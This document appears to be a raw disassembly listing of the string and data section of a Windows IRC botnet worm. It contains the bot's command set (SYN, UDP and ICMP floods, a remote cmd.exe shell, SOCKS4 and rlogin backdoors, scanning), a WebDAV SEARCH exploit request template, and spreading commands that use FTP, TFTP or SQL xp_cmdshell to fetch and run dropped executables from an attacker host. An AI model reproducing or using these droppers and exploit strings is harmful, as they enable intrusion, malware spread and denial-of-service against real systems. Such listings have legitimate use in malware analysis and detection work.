aLog_0 db 'log',0 ; DATA XREF: sub_4089DC+122C�o
aAl db 'al',0 ; DATA XREF: sub_4089DC+1218�o
align 4
aAliases db 'aliases',0 ; DATA XREF: sub_4089DC+1204�o
aT: ; DATA XREF: sub_4089DC+11F0�o
unicode 0, <t>,0
aThreads db 'threads',0 ; DATA XREF: sub_4089DC+11DC�o
aMainFailedToRe db '[MAIN]: Failed to reboot system.',0 ; DATA XREF: sub_4089DC+11A4�o
align 4
aMainRebootingS db '[MAIN]: Rebooting system.',0 ; DATA XREF: sub_4089DC+119D�o
align 4
aReboot db 'reboot',0 ; DATA XREF: sub_4089DC+118A�o
align 10h
aI_0: ; DATA XREF: sub_4089DC+1176�o
unicode 0, <i>,0
aId db 'id',0 ; DATA XREF: sub_4089DC+1162�o
align 4
aS_4: ; DATA XREF: sub_4089DC+114E�o
unicode 0, <s>,0
aStatus db 'status',0 ; DATA XREF: sub_4089DC+113A�o
align 4
aQ: ; DATA XREF: sub_4089DC+1126�o
unicode 0, <q>,0
aQuit_0 db 'quit',0 ; DATA XREF: sub_4089DC+1112�o
align 10h
aDc db 'dc',0 ; DATA XREF: sub_4089DC+10FE�o
align 4
aDisconnect db 'disconnect',0 ; DATA XREF: sub_4089DC+10EA�o
align 10h
aR: ; DATA XREF: sub_4089DC+10D6�o
; sub_4089DC+1929�o ...
unicode 0, <r>,0
aReconnect db 'reconnect',0 ; DATA XREF: sub_4089DC+10C2�o
align 10h
aStats db 'stats',0 ; DATA XREF: sub_4089DC+10AE�o
align 4
aScanstats db 'scanstats',0 ; DATA XREF: sub_4089DC+109A�o
align 4
aScan_0 db '[SCAN]',0 ; DATA XREF: sub_4089DC+108C�o
; sub_4089DC+5848�o
align 4
aScan_1 db 'Scan',0 ; DATA XREF: sub_4089DC+1087�o
align 4
aScanstop db 'scanstop',0 ; DATA XREF: sub_4089DC+1072�o
align 10h
aSecure_1 db '[SECURE]',0 ; DATA XREF: sub_4089DC+1064�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_4089DC+105F�o
align 4
aSecurestop db 'securestop',0 ; DATA XREF: sub_4089DC+104A�o
align 10h
aClones db '[CLONES]',0 ; DATA XREF: sub_4089DC+103C�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_4089DC+1037�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_4089DC+1022�o
align 10h
aPsstop db 'psstop',0 ; DATA XREF: sub_4089DC+100E�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_4089DC+FFA�o
align 4
aFfstop db 'ffstop',0 ; DATA XREF: sub_4089DC+FE6�o
align 4
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_4089DC+FD2�o
align 4
aTftp_0 db '[TFTP]',0 ; DATA XREF: sub_4089DC+FC4�o
align 4
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_4089DC+FAA�o
align 10h
aIcmp_0 db '[ICMP]',0 ; DATA XREF: sub_4089DC+F9C�o
align 4
aIcmpFlood db 'ICMP flood',0 ; DATA XREF: sub_4089DC+F97�o
align 4
aIcmpstop db 'icmpstop',0 ; DATA XREF: sub_4089DC+F82�o
align 10h
aPing_1 db '[PING]',0 ; DATA XREF: sub_4089DC+F74�o
align 4
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_4089DC+F6F�o
align 4
aPingstop db 'pingstop',0 ; DATA XREF: sub_4089DC+F5A�o
align 10h
aUpd db '[UPD]',0 ; DATA XREF: sub_4089DC+F4C�o
align 4
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_4089DC+F47�o
align 4
aUdpstop db 'udpstop',0 ; DATA XREF: sub_4089DC+F32�o
aSyn_0 db '[SYN]',0 ; DATA XREF: sub_4089DC+F24�o
align 4
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_4089DC+F1F�o
align 10h
aSynstop db 'synstop',0 ; DATA XREF: sub_4089DC+F0A�o
aDdos db '[DDoS]',0 ; DATA XREF: sub_4089DC+EFC�o
align 10h
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_4089DC+EF7�o
align 4
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_4089DC+EE2�o
align 4
aRedirect_0 db '[REDIRECT]',0 ; DATA XREF: sub_4089DC+ED4�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_4089DC+ECF�o
align 4
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_4089DC+EBA�o
align 4
aLog db '[LOG]',0 ; DATA XREF: sub_4089DC+EAC�o
align 4
aLogList db 'Log list',0 ; DATA XREF: sub_4089DC+EA7�o
align 4
aLogstop db 'logstop',0 ; DATA XREF: sub_4089DC+E92�o
aHttpd db '[HTTPD]',0 ; DATA XREF: sub_4089DC+E84�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_4089DC+E6A�o
align 4
aRlogind db '[RLOGIND]',0 ; DATA XREF: sub_4089DC+E5C�o
align 10h
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_4089DC+E42�o
align 4
aSocks4_0 db '[SOCKS4]',0 ; DATA XREF: sub_4089DC+E34�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_4089DC+E2F�o
; sub_4089DC+E57�o ...
align 10h
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_4089DC+E1A�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_4089DC+E06�o
align 10h
aSocks4 db 'socks4',0 ; DATA XREF: sub_4089DC+DF2�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_4089DC+DDE�o
align 10h
aUnsecure db 'unsecure',0 ; DATA XREF: sub_4089DC+DCA�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_4089DC+DB6�o
; sub_4089DC+4DF7�o
aSecure db 'secure',0 ; DATA XREF: sub_4089DC+DA2�o
; sub_4089DC+4DE7�o
align 4
aVer db 'ver',0 ; DATA XREF: sub_4089DC+D8E�o
aVersion db 'version',0 ; DATA XREF: sub_4089DC+D7A�o
aLo db 'lo',0 ; DATA XREF: sub_4089DC+D66�o
align 4
aLogout db 'logout',0 ; DATA XREF: sub_4089DC+D52�o
align 10h
aD: ; DATA XREF: sub_4089DC+D3E�o
; sub_413E26+7A�o
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_4089DC+D2A�o
aRn db 'rn',0 ; DATA XREF: sub_4089DC+D16�o
align 4
aRndnick db 'rndnick',0 ; DATA XREF: sub_4089DC+CFF�o
a63 db '63',0 ; DATA XREF: sub_4089DC+BE1�o
align 4
asc_4278A8: ; DATA XREF: sub_4089DC+BB9�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_4089DC+B81�o
align 4
aServer_1 db '$server',0 ; DATA XREF: sub_4089DC+B76�o
aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_4089DC+B65�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_4089DC+B47�o
align 10h
aUser_2 db '$user',0 ; DATA XREF: sub_4089DC+B36�o
align 4
aMe db '$me',0 ; DATA XREF: sub_4089DC+B24�o
aD_0 db '$%d',0 ; DATA XREF: sub_4089DC+ABB�o
aD_1 db '$%d-',0 ; DATA XREF: sub_4089DC+A08�o
align 4
dword_4278E8 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_4089DC+96E�o
dd 0A0Dh
dword_427900 dd 4E495001h, 47h ; DATA XREF: sub_4089DC+93F�o
dword_427908 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_4089DC+931�o
dd 0D017325h, 0Ah
dword_427924 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_4089DC+900�o
dword_427930 dd 23h ; DATA XREF: sub_4089DC+871�o
dword_427934 dd 6Ch ; DATA XREF: sub_4089DC+7CC�o
dword_427938 dd 323333h ; DATA XREF: sub_4089DC+72E�o
; sub_4089DC+7E9�o ...
aMainJoinedChan db '[MAIN]: Joined channel: %s.',0 ; DATA XREF: sub_4089DC+6F0�o
aMainUserSLog_0 db '[MAIN]: User: %s logged out.',0 ; DATA XREF: sub_4089DC+690�o
align 4
a353 db '353',0 ; DATA XREF: sub_4089DC+63E�o
aPart db 'PART',0 ; DATA XREF: sub_4089DC+5C2�o
align 4
aSS_3 db ':%s%s',0 ; DATA XREF: sub_4089DC+593�o
align 4
aNick db 'NICK',0 ; DATA XREF: sub_4089DC+3E4�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+370�o
; sub_4089DC+6CE�o
aMainUserSLogge db '[MAIN]: User %s logged out.',0 ; DATA XREF: sub_4089DC+357�o
; sub_4089DC+4F35�o ...
aKick db 'KICK',0 ; DATA XREF: sub_4089DC+2D7�o
align 4
aNickS_0 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+26E�o
; sub_4089DC+3D4D�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_4089DC+24B�o
a@: ; DATA XREF: sub_4089DC+222�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_4089DC+215�o
a005 db '005',0 ; DATA XREF: sub_4089DC+202�o
a001 db '001',0 ; DATA XREF: sub_4089DC+1EF�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+1D2�o
; sub_4089DC+351B�o ...
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_4089DC+1B0�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_4089DC+19A�o
align 4
asc_427A0C: ; DATA XREF: sub_4089DC+188�o
; sub_4089DC+5AF6�o
unicode 0, <!>,0
aSecureSystemSe db '[SECURE]: System secure monitor active.',0 ; DATA XREF: sub_40E6BB+38F�o
aMainBotStarted db '[MAIN]: Bot started.',0 ; DATA XREF: sub_40E6BB+356�o
align 10h
aSDS db '%s %d "%s"',0 ; DATA XREF: sub_40E6BB+286�o
align 4
aRedirectFail_0 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_40ECAB+153�o
aRedirectClient db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40ECAB+DB�o
align 4
aRedirectFail_1 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40EE88+13F�o
aRedirectClie_0 db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40EE88+DD�o
align 4
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_40F077+35�o
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_40F105:loc_40F269�o
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_40F105+141�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_40F105:loc_40F214�o
align 10h
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_40F292+18E�o
align 10h
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_40F292+146�o
align 10h
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40F292+1F�o
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_40F441:loc_40F473�o
align 10h
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_40F48C+39�o
align 4
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_40F4D9+1EF�o
align 4
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_40F4D9+1CF�o
align 4
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_40F4D9+1AF�o
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_40F4D9+184�o
align 4
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_40F4D9+F4�o
align 4
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_40F6E5+215�o
align 4
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_40F6E5+1C9�o
align 10h
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_40F6E5+158�o
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_40F6E5+FF�o
align 4
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_40F6E5+70�o
align 4
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_40F6E5+3E�o
align 10h
aSI db '%s%i',0 ; DATA XREF: sub_40F961+40�o
; .text:0040FA5C�o ...
align 4
aPc db 'PC',0 ; DATA XREF: .text:0040FA2A�o
align 4
aS_7 db '[%s]',0 ; DATA XREF: .text:0040FB92�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40FB89�o
; sub_4116D2:loc_411773�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040FB82�o
aXp_0 db 'XP',0 ; DATA XREF: .text:0040FB77�o
; sub_4116D2+8B�o
align 10h
a2k db '2K',0 ; DATA XREF: .text:0040FB6A�o
; sub_4116D2+7C�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040FB57�o
; sub_4116D2+68�o
align 4
a98 db '98',0 ; DATA XREF: .text:0040FB4A�o
; sub_4116D2+59�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:0040FB3D�o
; sub_4116D2+4A�o
align 10h
a95 db '95',0 ; DATA XREF: .text:0040FB32�o
; sub_4116D2+39�o
align 4
aDS db '[%d]%s',0 ; DATA XREF: sub_40FBDB+39�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_40FBDB+2B�o
; sub_40FBDB+50�o
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_40FD09+85�o
align 4
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_40FDCB+40�o
align 4
aD_2 db 'D:\',0 ; DATA XREF: .data:0042C394�o
aD_3 db 'D$',0 ; DATA XREF: .data:0042C390�o
align 10h
aC_2 db 'C:\',0 ; DATA XREF: .data:0042C38C�o
aC_3 db 'C$',0 ; DATA XREF: .data:0042C388�o
align 4
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .data:0042C380�o
align 10h
aIpc db 'IPC$',0 ; DATA XREF: .data:off_42C378�o
align 4
aSecureNetapi32 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_40FE91+2E8�o
; sub_4101B8+2DA�o
align 4
aSecureNetworkS db '[SECURE]: Network shares deleted.',0 ; DATA XREF: sub_40FE91+2D2�o
align 4
aSecureFailed_4 db '[SECURE]: Failed to delete ',27h,'%S',27h,' share.',0
; DATA XREF: sub_40FE91:loc_4100FC�o
align 10h
aSecureShareS_0 db '[SECURE]: Share ',27h,'%S',27h,' deleted.',0
; DATA XREF: sub_40FE91+264�o
align 10h
aSecureFailed_3 db '[SECURE]: Failed to delete ',27h,'%s',27h,' share.',0
; DATA XREF: sub_40FE91:loc_41006C�o
align 4
aSecureShareSDe db '[SECURE]: Share ',27h,'%s',27h,' deleted.',0
; DATA XREF: sub_40FE91+1D4�o
align 4
aSecureAdvapi32 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_40FE91:loc_40FFC4�o
; sub_4101B8:loc_4102E7�o
align 4
aSecureFailed_2 db '[SECURE]: Failed to open IPC$ Restriction registry key.',0
; DATA XREF: sub_40FE91:loc_40FFBD�o
aSecureRestrict db '[SECURE]: Restricted access to the IPC$ Share.',0
; DATA XREF: sub_40FE91:loc_40FFA5�o
align 4
aSecureFailed_1 db '[SECURE]: Failed to restrict access to the IPC$ Share.',0
; DATA XREF: sub_40FE91+10D�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_40FE91+EE�o
; sub_4101B8+EE�o
align 4
aSecureFailed_0 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_40FE91+92�o
; sub_4101B8+92�o
aSecureDcomDisa db '[SECURE]: DCOM disabled.',0 ; DATA XREF: sub_40FE91:loc_40FF05�o
align 10h
aSecureDisableD db '[SECURE]: Disable DCOM failed.',0 ; DATA XREF: sub_40FE91+6D�o
align 10h
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_40FE91+55�o
; sub_4101B8+55�o
align 4
aSecureNetwor_0 db '[SECURE]: Network shares added.',0 ; DATA XREF: sub_4101B8+2C2�o
aC_0 db '%c:\',0 ; DATA XREF: sub_4101B8+22C�o
align 4
aC_1 db '%c$',0 ; DATA XREF: sub_4101B8+21B�o
aSecureFailed_7 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_4101B8:loc_410366�o
; sub_4101B8:loc_41042D�o
aSecureShareSAd db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_4101B8+1A7�o
; sub_4101B8+26E�o
aSecureFailed_6 db '[SECURE]: Failed to open IPC$ restriction registry key.',0
; DATA XREF: sub_4101B8:loc_4102E0�o
aSecureUnrestri db '[SECURE]: Unrestricted access to the IPC$ Share.',0
; DATA XREF: sub_4101B8:loc_4102C8�o
align 4
aSecureFailed_5 db '[SECURE]: Failed to unrestrict access to the IPC$ Share.',0
; DATA XREF: sub_4101B8+109�o
align 10h
aSecureDcomEnab db '[SECURE]: DCOM enabled.',0 ; DATA XREF: sub_4101B8:loc_41022C�o
aSecureEnableDc db '[SECURE]: Enable DCOM failed.',0 ; DATA XREF: sub_4101B8+6D�o
align 4
aRlogindFaile_2 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_410547+B7�o
align 4
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_410547+80�o
align 4
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_410613+89�o
aRlogindFaile_5 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_4107C5+B2�o
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_4107C5+82�o
align 4
aRlogindFaile_3 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_4107C5+5F�o
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_4108C1+E2�o
align 4
aRlogindFaile_6 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_4108C1+59�o
; sub_4108C1+8F�o
db '.',0
align 4
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_410DC6+1A7�o
align 4
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_410DC6+187�o
align 4
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_410DC6+F6�o
align 4
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_410FF6+1A1�o
align 4
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_410FF6+16C�o
align 4
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_410FF6+107�o
align 4
aSynSendErrorD_ db '[SYN]: Send error: <%d>.',0 ; DATA XREF: sub_4111E2+242�o
align 4
aSynDoneWithFlo db '[SYN]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_4114B6+48�o
align 4
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_411551+39�o
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_4116D2+247�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 10h
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_4116D2+161�o
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_4116D2:loc_411805�o
align 4
aSS_5 db '%s (%s)',0 ; DATA XREF: sub_4116D2+C0�o
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_411939+99�o
align 4
off_42872C dd offset loc_412F4E ; DATA XREF: sub_411939+67�o
dword_428730 dd 4E414Ch ; DATA XREF: sub_411939:loc_411998�o
dword_428734 dd 6C616944h, 70752Dh ; DATA XREF: sub_411939+50�o
dword_42873C dd 20746F4Eh, 6E6E6F63h, 65746365h, 64h, 0 ; DATA XREF: sub_411939+3A�o
aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_4119EF+3C5�o
db 'd: <%d>.',0
align 10h
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_4119EF+35B�o
db 'c (%dMB).',0
align 4
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_4119EF+CB�o
align 4
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_4119EF+AC�o
align 4
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_4119EF+67�o
align 4
dword_42886C dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411DD2+460�o
aTftpFileTran_0 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_411DD2+44C�o
align 4
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_411DD2+395�o
align 4
dword_4288CC dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DD2+379�o
aTftpFileTransf db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_411DD2+324�o
align 10h
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_411DD2+14D�o
align 4
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_411DD2+6C�o
aOctet db 'octet',0 ; DATA XREF: sub_411DD2+11�o
align 4
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_412305+10�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_4124D0+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_4124D0+35�o
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_4125E5+2B8�o
; .text:00412D83�o ...
align 4
aHostSContentTy db 'Host: %s',0Dh,0Ah ; DATA XREF: sub_4125E5+1BA�o
db 'Content-Type: text/xml',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttp1_1 db ' HTTP/1.1',0Dh,0Ah,0 ; DATA XREF: sub_4125E5+183�o
aSearch db 'SEARCH /',0 ; DATA XREF: sub_4125E5+CC�o
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: .text:00412CED�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: .text:00412CC3�o
aNilsisgay db 'NILSISGAY!!',0 ; DATA XREF: .text:00412B94�o
; ---------------------------------------------------------------------------
loc_428ABC: ; DATA XREF: .text:00412B81�o
jmp short loc_428ACD
; ---------------------------------------------------------------------------
align 10h
dword_428AC0 dd 2016280h, 100BDh, 8F160001h ; DATA XREF: .text:00412B09�o
db 82h
; ---------------------------------------------------------------------------
loc_428ACD: ; CODE XREF: .rdata:loc_428ABC�j
add [eax], eax
; ---------------------------------------------------------------------------
db 0
dd 2 dup(0)
aEchoOpenSDOE_0 db 'echo open %s %d>o&echo USER a>>o&echo a>>o&echo binary>>o&echo ge'
; DATA XREF: sub_412DDE+8E�o
; .text:00413A97�o
db 't resource32w.exe>>o&echo quit>>o&ftp -n -s:o&del o&resource32w.e'
db 'xe',0Dh,0Ah,0
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_412F21+27�o
; .text:0041355D�o
align 4
dword_428B6C dd 1CEC8166h ; DATA XREF: sub_412F21+D�r
; .text:00413509�r
dword_428B70 dd 0E4FF07h ; DATA XREF: sub_412F21+16�r
; .text:00413513�r
aSTryingToXploi db '[%s]: Trying to Xploit IP: %s.',0 ; DATA XREF: .text:00413B0E�o
align 4
aSExploitingI_0 db '[%s]: Exploiting IP: (%s:%d) User: (%s/%s).',0
; DATA XREF: .text:00413D7F�o
aTftpFileTran_1 db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:00413D06�o
align 4
aExecMaster___0 db 'EXEC master..xp_cmdshell ',27h,'%s',27h,0 ; DATA XREF: .text:00413CF1�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET %s',27h,0
; DATA XREF: .text:00413CBA�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: .text:00413C2F�o
align 10h
aSExploitingI_1 db '[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)',0
; DATA XREF: sub_413E26+206�o
align 4
aNoPassword db '(no password)',0 ; DATA XREF: sub_413E26+1E4�o
align 4
aSSS_3 db '%s\%s\%s',0 ; DATA XREF: sub_413E26+CB�o
align 10h
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: sub_413E26+6C�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: sub_413E26+65�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: sub_413E26+5E�o
aSIpc_0 db '%s\ipc$',0 ; DATA XREF: .text:0041415C�o
aS_6 db '\\%s',0 ; DATA XREF: .text:0041411E�o
align 4
stru_428D08 _msEH <0FFFFFFFFh, 0, offset sub_414839> ; DATA XREF: sub_4147F3+2�o
align 8
stru_428D18 _msEH <0FFFFFFFFh, 0, offset sub_414897> ; DATA XREF: sub_414844+2�o
align 8
stru_428D28 _msEH <0FFFFFFFFh, 0, offset sub_4149E0> ; DATA XREF: sub_41499E+2�o
align 8
stru_428D38 _msEH <0FFFFFFFFh, 0, offset sub_414B4A> ; DATA XREF: sub_4149EA+2�o
align 8
stru_428D48 _msEH <0FFFFFFFFh, 0, offset sub_414BE9> ; DATA XREF: sub_414B97+2�o
db 0
align 4
stru_428D58 _msEH <0FFFFFFFFh, 0, offset sub_414C75> ; DATA XREF: sub_414C06+2�o
align 8
stru_428D68 _msEH <0FFFFFFFFh, offset loc_415004, offset loc_415008>
; DATA XREF: sub_414F66+2�o
align 8
stru_428D78 _msEH <0FFFFFFFFh, 0, offset sub_415B33> ; DATA XREF: sub_415ADF+2�o
align 8
stru_428D88 _msEH <0FFFFFFFFh, 0, offset sub_415D00> ; DATA XREF: sub_415C85+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_415D49+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_415D49�o
stru_428DB0 _msEH <0FFFFFFFFh, 0, offset sub_4160C6> ; DATA XREF: sub_416087+2�o
; sub_416492+53�r
align 10h
stru_428DC0 _msEH <0FFFFFFFFh, offset loc_4162B1, offset loc_4162C5>
; DATA XREF: .text:0041611B�o
align 10h
byte_428DD0 db 6 ; DATA XREF: sub_416492:loc_4164F3�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .data:off_42D7DC�o
unicode 0, <(null)>,0
align 4
aNull_1 db '(null)',0 ; DATA XREF: .data:off_42D7D8�o
align 8
stru_428E48 _msEH <0FFFFFFFFh, offset loc_417210, offset loc_417214>
; DATA XREF: sub_416D3B+5�o
align 8
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
